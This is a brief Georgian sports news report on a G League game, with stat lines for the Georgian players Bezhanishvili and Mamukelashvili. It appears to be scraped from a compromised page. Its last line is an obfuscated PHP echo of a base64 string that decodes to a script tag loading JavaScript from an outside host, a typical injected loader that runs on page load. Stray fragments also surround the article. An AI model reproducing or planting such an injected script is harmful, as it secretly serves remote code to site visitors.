celsiusi
ავერსი შნაიდერი
ნაციონალური საკალათბურთო ასოციაციის განვითარების ლიგაში, მორიგი ტურის მატჩები გაიმართა.
 
„გრანდ რაპიდს გოლდს“, რომელიც „დენვერ ნაგეტსის“ გუნდია და ქართველი კალათბურთელი გიორგი ბეჟანიშვილი თამაშობს, „მილუოკი ბაქსის“ G ლიგის გუნდს „ვისკონსინ ჰერდი“ შეხვდა, სადაც სანდრო მამუკელაშვილი თამაშობს. შეხვედრა ბეჟანიშვილის გუნდის სასარგებლოად დასრულდა 111-107.
 
გიორგი ბეჟანიშვილმა 18 წუთში 6 ქულა, 12 მოხსნა (5 შეტევაში) და 2 პასი მიითვალა. მან 9-დან 3 ორქულიანი ჩააგდო და 2 ერთქულიანი უშედეგოდ ისროლა. ბეჟანიშვილმა 3-ჯერ დაკარგა ბურთი და 5 პერსონალური ფოლი მიიღო.
 
სანდრო მამუკელაშვილმა 33 წუთში 15 ქულა, 7 მოხსნა (4 შეტევაში), 3 პასი, 1 ჩაჭრა და 2 დაფარება დააგროვა. მან 5-დან 1 სამქულიანი და 10-დან 6 ორქულიანი გამოიყენა, საჯარიმო კი 3-ჯერ ისროლა და უშედეგოდ. სანდრო მეტოქის წინააღმდეგ 4-ჯერ დაჯარიმდა.
 
869
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");